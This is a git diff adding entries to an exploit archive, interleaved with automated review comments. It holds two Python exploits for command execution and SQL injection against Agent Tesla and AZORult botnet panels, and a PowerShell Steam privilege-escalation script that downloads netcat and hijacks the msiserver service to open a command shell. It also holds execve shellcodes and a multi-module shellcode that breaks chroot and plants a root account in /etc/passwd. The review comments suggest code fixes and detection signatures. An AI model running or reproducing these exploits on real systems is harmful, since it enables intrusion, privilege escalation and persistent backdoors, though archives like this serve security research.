diff --git a/exploits/php/remote/47243.py b/exploits/php/remote/47243.py
new file mode 100755
index 000000000..347457005
--- /dev/null
+++ b/exploits/php/remote/47243.py
@@ -0,0 +1,54 @@
+import requests
+import argparse
+import base64
+
+# Agent Tesla C2 RCE by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+
+def get_args():
+ parser = argparse.ArgumentParser(
+ prog="agent_tesla_sploit.py",
+ formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+ epilog= '''
+ This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard.
+ ''')
+ parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)")
+ parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+ parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+ args = parser.parse_args()
+ return args
+
+def pwn_target(target, command, proxy):
+ requests.packages.urllib3.disable_warnings()
+ proxies = {'http': proxy, 'https': proxy}
+ print('[*] Probing...')
+ get_params = {
+ 'table':'screens',
+ 'primary':'HWID',
+ 'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}',
+ 'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8'))
+ }
+ target = target + '/server_side/scripts/server_processing.php'
+ try:
+ r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+ print("[*] Your IP: {}".format(r.text))
+ headers = {
+ "User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+ }
+ r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies)
+ result = r.json()['data'][-1]['HWID']
+ print('[+] {}'.format(result))
+ except:
+ print("[-] ERROR: Something went wrong.")
+ print(r.text)
+ raise
+
+def main():
+ print ()
+ print ('Agent Tesla RCE by prsecurity.')
+ args = get_args()
+ pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
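Review bot: The bare `except:` at the end of `pwn_target` prints `r.text` in its handler, but `r` is unbound when the first `requests.get` (the IP probe) is what raised, so the handler itself fails with `UnboundLocalError` and masks the original error; it also swallows `KeyboardInterrupt`. Catch a real class and report the exception rather than `r`: `except Exception as exc:` / `print("[-] ERROR: {}".format(exc))` / `raise`. The same handler, with the same unbound-`r` problem, appears in `pwn_target` of 47244.py. For defenders, the request this script sends is distinctive: the `clmns` parameter carries a serialized PHP array naming `exec` as the `formatter` and `where` is base64-encoded, so either value in a request to `server_processing.php` is a reasonable web-log signature when hunting for exploitation of these panels.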
diff --git a/exploits/php/remote/47244.py b/exploits/php/remote/47244.py
new file mode 100755
index 000000000..a9de00a79
--- /dev/null
+++ b/exploits/php/remote/47244.py
@@ -0,0 +1,95 @@
+import requests
+import argparse
+import base64
+
+# Azorult 3.3.1 C2 SQLi by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+# change GUID and XOR key to specific beacon, can be extracted from a sample
+
+guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
+key = "\x03\x55\xae"
+
+def get_args():
+ parser = argparse.ArgumentParser(
+ prog="azorult_sploit.py",
+ formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+ epilog= '''
+ This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
+ ''')
+ parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
+ parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
+ parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+ args = parser.parse_args()
+ return args
+
+def CB_XORm(data, key):
+ j=0
+ key = list(key)
+ data = list(data)
+ tmp = list()
+ for i in range(len(data)):
+ tmp.append(chr(ord(data[i])^ord(key[j])))
+ j += 1
+ if j > (len(key)-1):
+ j = 0
+ return "".join(tmp)
+
+def pwn_target(target, num_records, proxy):
+ requests.packages.urllib3.disable_warnings()
+ proxies = {'http': proxy, 'https': proxy}
+
+ try:
+ r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+ print("[*] Your IP: {}".format(r.text))
+ headers = {
+ "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+ }
+ print('[+] Getting URL, LOGIN AND PASS')
+ data = [
+ "|".join([
+ "1","2","3","4","5","6","7","8","9","10","11","12"
+ ]),
+ "\r\n".join([
+ "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select 
concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
+ ]),
+ "c",
+ "d",
+ ":".join(["'11","22"])
+ ]
+ payload = CB_XORm(guid.join(data), key)
+ r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+ if r.text != "OK":
+ print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+ raise
+ print('[+] Getting LOGIN/PASS')
+ data = [
+ "|".join([
+ "1","2","3","4","5","6","7","8","9","10","11","12"
+ ]),
+ "\r\n".join([
+ "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
+ ]),
+ "c",
+ "d",
+ ":".join(["'11","22"])
+ ]
+ payload = CB_XORm(guid.join(data), key)
+ r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+ if r.text != "OK":
+ print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+ raise
+ print('[+] If this worked, you will see two new records in password table at guest.php')
+ except:
+ print("[-] ERROR: Something went wrong.")
+ print(r.text)
+ raise
+
+def main():
+ print ()
+ print ('Azorult 3.3.1 SQLi by prsecurity')
+ args = get_args()
+ pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/windows/local/47238.ps1 b/exploits/windows/local/47238.ps1
new file mode 100644
index 000000000..6502574f8
--- /dev/null
+++ b/exploits/windows/local/47238.ps1
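Review bot: The two `raise` statements under `if r.text != "OK":` in `pwn_target` of 47244.py have no active exception to re-raise, so Python raises `RuntimeError: No active exception to reraise` and the outer handler then prints its generic message on top of the specific one just printed; raise an explicit exception instead, e.g. `raise RuntimeError("unexpected response, Azorult version may not be 3.3.1")`, and drop the preceding `print`. `CB_XORm` should be `snake_case` per PEP 8, and its hand-rolled key-index wraparound is what `itertools.cycle` exists for: `return "".join(chr(ord(d) ^ ord(k)) for d, k in zip(data, itertools.cycle(key)))` (with `import itertools` at the top). The `key = list(key)` and `data = list(data)` copies are unnecessary because `str` already indexes per character.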
@@ -0,0 +1,30 @@
+$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
+$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
+$RegDir = "C:\Windows\Temp\RegLN.exe"
+$PayDir = "C:\Windows\Temp\payload.exe"
+$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
+$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
+$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
+$WebClient = New-Object System.Net.WebClient
+
+
+If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
+{
+$WebClient.DownloadFile($PayDownload, $PayDir)
+$WebClient.DownloadFile($RegDownload, $RegDir)
+}
+
+If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
+{
+Start-Service -DisplayName "Steam Client Service"
+Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+Start-Service -Name "msiserver"
+}
+Else
+{
+Remove-Item -Path $SteamRegKey -Recurse
+Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
+Start-Service -DisplayName "Steam Client Service"
+Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+Start-Service -Name "msiserver"
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 64afad563..67775d97a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
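Review bot: The script carries no header comment, so nothing states its preconditions or side effects: it downloads two executables from `$PayDownload`/`$RegDownload` into `C:\Windows\Temp` with no integrity check, replaces `ImagePath` of `msiserver` with `$Payload`, and never restores the original value, so the Windows Installer service is left pointing at `payload.exe` after the run. Add a header naming the prerequisite (`Steam Client Service` present and startable), the permanent change to `HKLM:\SYSTEM\CurrentControlSet\Services\msiserver`, and the two files left on disk. For defenders those same steps are the detection points: a modification of `msiserver`'s `ImagePath` right after a `Steam Client Service` start, executables written to `C:\Windows\Temp`, and `Start-Service -Name "msiserver"` launching `cmd.exe /c`. The `Else` branch also deletes `$SteamRegKey` recursively before re-creating it through `RegLN.exe`; that destructive step deserves its own comment, since a failed `Start-Process` leaves the Steam key gone.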
@@ -10631,6 +10631,7 @@ id,file,description,date,author,type,platform,port
 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
+47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17603,6 +17604,8 @@ id,file,description,date,author,type,platform,port
 47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
 47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
 47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
+47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
+47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 952e28d54..ddac87adc 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -993,3 +993,6 @@ id,file,description,date,author,type,platform
 47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
 47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
 47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
+47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
+47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
+47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + BreakĀ­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
diff --git a/shellcodes/linux/47239.c b/shellcodes/linux/47239.c
new file mode 100644
index 000000000..2d6b30bdc
--- /dev/null
+++ b/shellcodes/linux/47239.c
@@ -0,0 +1,49 @@
+/* Alpha (AXP) Linux/Tru64 execve() shellcode
+* ==========================================
+* This shellcode uses the stack to store a generated
+* "callsys" instruction, due to this it needs executable
+* stack. To test on Linux use "execstack -s " and
+* on Tru64 use "sysconfig -r proc executable_stack=1".
+*
+* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
+*
+* -- Hacker Fantastic (https://hacker.house)
+*/
+#include
+#include
+
+unsigned char shellcode[] = {
+ "\x80\xff\xde\x23" /* lda $sp,-128($sp) */
+ "\x73\x68\x3f\x24" /* ldil $1, 0x68732f2f */
+ "\x2f\x2f\x21\x20" /* sll $1, 0x20 */
+ "\x21\x17\x24\x48" /* ldil $2, 0x6e69622f */
+ "\x69\x6e\x5f\x24" /* addq $1, $2, $1 */
+ "\x2f\x62\x42\x20" /* stq $31, -32($sp) */
+ "\x01\x04\x22\x40" /* stq $31, -24($sp) */
+ "\xe0\xff\xfe\xb7" /* stq $31, -8($sp) */
+ "\xe8\xff\xfe\xb7" /* stq $1, -16($sp) */
+ "\xf8\xff\xfe\xb7" /* mov $sp, $16 */
+ "\xf0\xff\x3e\xb4" /* subq $16, 0x10, $16 */
+ "\x10\x04\xfe\x47" /* stq $16, -40($sp) */
+ "\x30\x15\x02\x42" /* mov $sp, $17 */
+ "\xd8\xff\x1e\xb6" /* subq $17, 0x28, $17 */
+ "\x11\x04\xfe\x47" /* mov $sp, $18 */
+ "\x31\x15\x25\x42" /* subq $18, 0x18, $18 */
+ "\x12\x04\xfe\x47" /* ldil $0, 0xffffff3c */
+ "\x32\x15\x43\x42" /* ldil $1, 0xffffff01 */
+ "\x3c\xff\x1f\x20" /* subq $0, $1, $0 */
+ "\x01\xff\x3f\x20" /* ldil $1, 0xffffff84 */
+ "\x20\x05\x01\x40" /* ldil $2, 0xffffff01 */
+ "\x84\xff\x3f\x20" /* subq $1, $2, $1 */
+ "\x01\xff\x5f\x20" /* stl $1, -48($sp) */
+ "\x21\x05\x22\x40" /* subq $sp, 0x30, $sp */
+ "\xd0\xff\x3e\xb0" /* jmp $sp,($sp),0xff10 */
+ "\x3e\x15\xc6\x43"
+ "\xc4\x3f\xde\x6b"
+};
+
+int main(){
+ int (*func)();
+ func = (int (*)())shellcode;
+ func();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47240.S b/shellcodes/linux_x86/47240.S
new file mode 100644
index 000000000..44307cd16
--- /dev/null
+++ b/shellcodes/linux_x86/47240.S
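Review bot: The two `#include` directives (and the `execstack -s ` example in the header) have lost their arguments, most likely angle-bracketed text stripped as markup when the file was rendered, so the listing does not compile as shown; restore the header names, or simply delete the two directives since nothing in the file calls a library function. The mnemonic comments beside the byte rows also drift from the third row onward: each `ldil` pseudo-op presumably expands to an `ldah`/`lda` pair, so after `ldil $1, 0x68732f2f` the comments sit one row ahead of the bytes they describe, two rows ahead after `ldil $2, 0x6e69622f`, and the last two rows carry no comment at all. Re-aligning them one per row (or one per pseudo-op spanning two rows) is what makes a listing like this auditable by someone checking that the bytes match the description.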
@@ -0,0 +1,67 @@
+# tolower() execve() /bin/sh -c (user supplied command)
+# shellcode to evade tolower() and friends, requires %esi
+# to reference a valid writeable address (usually does)
+.text
+ .global _start
+_start:
+ jmp data
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+ nop
+start:
+ popl %edi
+ movl %edi, %ecx
+ xorl %eax,%eax
+ movl %eax,%es:(%esi)
+ pushl %es:(%esi)
+ pushl $0x68732f2f
+ pushl $0x6e69622f
+ movl %esp,%ebx
+ movl %eax,%es:(%esi)
+ pushl %es:(%esi)
+ pushw $0x632d
+ movl %esp,%edi
+ movl %eax,%es:(%esi)
+ pushl %es:(%esi)
+ movl %ecx,%eax
+ movl %eax,%es:(%esi)
+ pushl %es:(%esi)
+ movl %edi,%eax
+ movl %eax,%es:(%esi)
+ pushl %es:(%esi)
+ movl %ebx,%eax
+ movl %eax,%es:(%esi)
+ pushl %es:(%esi)
+ movl %esp,%esi
+ movl %esi,%ecx
+ xorl %eax, %eax
+ movb $0x08, %al
+ addb $0x03, %al
+ int $0x80
+data:
+ call start
+ #command
+.ascii "id"
\ No newline at end of file
diff --git a/shellcodes/linux_x86/47242.asm b/shellcodes/linux_x86/47242.asm
new file mode 100644
index 000000000..53d1ed903
--- /dev/null
+++ b/shellcodes/linux_x86/47242.asm
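Review bot: The 26 `nop`s following `jmp data` in `_start` are never executed (the jump is unconditional and `start:` is entered only through `call start`), and nothing says what they are for; drop them or state their purpose with a comment such as `# padding, never executed: control enters at start via the call from data`. The header documents the `%esi` precondition but not the matching `%es` one: every `movl %eax,%es:(%esi)`/`pushl %es:(%esi)` pair also assumes `%es` selects a writable data segment (true for an ordinary Linux process, but the contract should say so). The final `.ascii "id"` is annotated only as `#command`; noting that it is the byte string whose address `popl %edi` receives at `start:` (the return address pushed by `call start`) would make the data/code relationship explicit. `xorl %eax, %eax` and `movl %edi, %ecx` also put a space after the comma while the rest of the file does not — pick one spacing.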
@@ -0,0 +1,204 @@
+;# Description: SCORE - The ShellCORE
+;# score is a complete shellcode for x86 processors running
+;# linux. It is designed to help work further with an exploited
+;# process.
+;#
+;# Coded by: prdelka
+
+;#########################
+;# [CORE] #
+;#########################
+
+;--- NOP Equivalent instruction
+ cld
+ cld
+ cld
+ cld
+ cld
+ cld
+ cld
+ cld
+ cld
+ cld
+ cld
+ cld
+
+;--- core initialise
+ jmp $+0x06
+ pop edi
+ push edi
+ jmp edi
+ call $-0x04
+;--- core prompt
+ pop edi
+ push 0x3e0a7964
+ push 0x61655220
+ push 0x65726f43
+ xor eax,eax
+ mov al,0x4
+ xor ebx,ebx
+ mov bl,0x1
+ mov ecx,esp
+ xor edx,edx
+ mov dl,0xc
+ int 0x80
+;--- core read choice
+ xor eax,eax
+ mov ebp,esp
+ push eax
+ mov al,0x3
+ xor ebx,ebx
+ mov bl,0x1
+ mov ecx,ebp
+ xor edx,edx
+ mov dl,0x2
+ int 0x80
+;--- core module selector
+ mov edx,ebp
+
+;### [backdoor module] 'b'
+ cmp word[edx],0x0a62
+ je $+0x5e
+;### [break-chroot-jail module] 'j'
+ cmp word[edx],0x0a6a
+ je $+0x59
+;### [privilege restore module] 'p'
+ cmp word[edx],0x0a70
+ je $+0x37
+;### [shellcode module] 's'
+ cmp word[edx],0x0a73
+ je $+0x14
+;### [exit module] 'x'
+ cmp word[edx],0x0a78
+ je $+0x05
+;--- core loop
+ push edi
+ jmp edi
+
+;#########################
+;# [MODULES] #
+;#########################
+
+;--- [exit module]
+ xor eax,eax
+ mov al,0x1
+ xor ebx,ebx
+ int 0x80
+
+;--- [shellcode module]
+ xor eax,eax
+ push eax
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx,esp
+ push eax
+ mov edx,esp
+ push ebx
+ mov ecx,esp
+ mov al,0xB
+ int 0x80
+;### [core loop]
+ push edi
+ jmp edi
+
+;--- [privilege restore module]
+ xor eax,eax
+ mov ah,0x17
+ shr eax,0x8
+ xor ebx,ebx
+ int 0x80
+ xor eax,eax
+ mov ah,0x2e
+ shr eax,0x8
+ xor ebx,ebx
+ int 0x80
+;### [core loop]
+ push edi
+ jmp edi
+
+;### [LONG backdoor module jump]
+ jmp $+0x46
+
+;--- [break-chroot-jail]
+ xor eax,eax
+ push eax
+ push 0x6c69616a
+ mov ebx,esp
+ mov edx,esp
+ mov cx,0x2F3
+ mov al,0x27
+ int 0x80
+ xor 
eax,eax
+ push eax
+ mov ebx,edx
+ mov al,0x3d
+ int 0x80
+ push 0x2e2e2e2e
+ mov ebx,esp
+ add bl,0x2
+ mov edx,ebx
+ xor ecx,ecx
+ mov cl,0xff
+ mov al,0x0c
+ mov ebx,edx
+ int 0x80
+ loop $-0x06
+ mov ebx,edx
+ add bl,0x1
+ mov al,0x3d
+ int 0x80
+;### [core loop]
+ push edi
+ jmp edi
+
+;--- [backdoor module]
+ xor eax,eax
+ push eax
+ push 0x64777373
+ push 0x61702f2f
+ push 0x6374652f
+ mov esi,esp
+ xor edx,edx
+ xor ecx,ecx
+ mov cl,0x01
+ mov ebx,esi
+ xor eax,eax
+ mov al,0x5
+ int 0x80
+ push eax
+ mov esi,esp
+ xor eax,eax
+ mov al,0x13
+ mov ebx,[esi]
+ xor ecx,ecx
+ xor edx,edx
+ mov dl,0x2
+ int 0x80
+ xor eax,eax
+ mov al,0x4
+ mov ebx,[esi]
+ xor ecx,ecx
+ push ecx
+ push 0x0a687361
+ push 0x622f6e69
+ push 0x622f3a74
+ push 0x6f6f722f
+ push 0x3a676663
+ push 0x20726f66
+ push 0x20726573
+ push 0x75206d65
+ push 0x74737973
+ push 0x3a303a30
+ push 0x3a3a6766
+ push 0x63737973
+ mov ecx,esp
+ xor edx,edx
+ mov dl,0x30
+ int 0x80
+ xor eax,eax
+ mov al,0x6
+ mov ebx,[esi]
+ int 0x80
+;### [core loop]
+ push edi
+ jmp edi
\ No newline at end of file
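Review bot: The module selector dispatches through hand-computed relative jumps (`je $+0x5e`, `je $+0x59`, `je $+0x37`, `je $+0x14`, `je $+0x05`, and later `jmp $+0x46` and `loop $-0x06`), so any edit that changes the encoded length of an instruction in between silently retargets a branch into the middle of another module with no assembler diagnostic; NASM labels (`je backdoor`, `je break_chroot`, ...) let the assembler do the arithmetic and can still produce the same short-jump encoding. The `;# Coded by: prdelka` header disagrees with the `files_shellcodes.csv` entry for 47242, which credits "Hacker House" as author; the header should name both the original author and the submitter, or the index entry should be corrected. The comments name each module but not what it does to the host: a one-line note per module listing the syscalls it issues (the numbers loaded into `al` before each `int 0x80`) would let an analyst audit the listing without decoding every `push`.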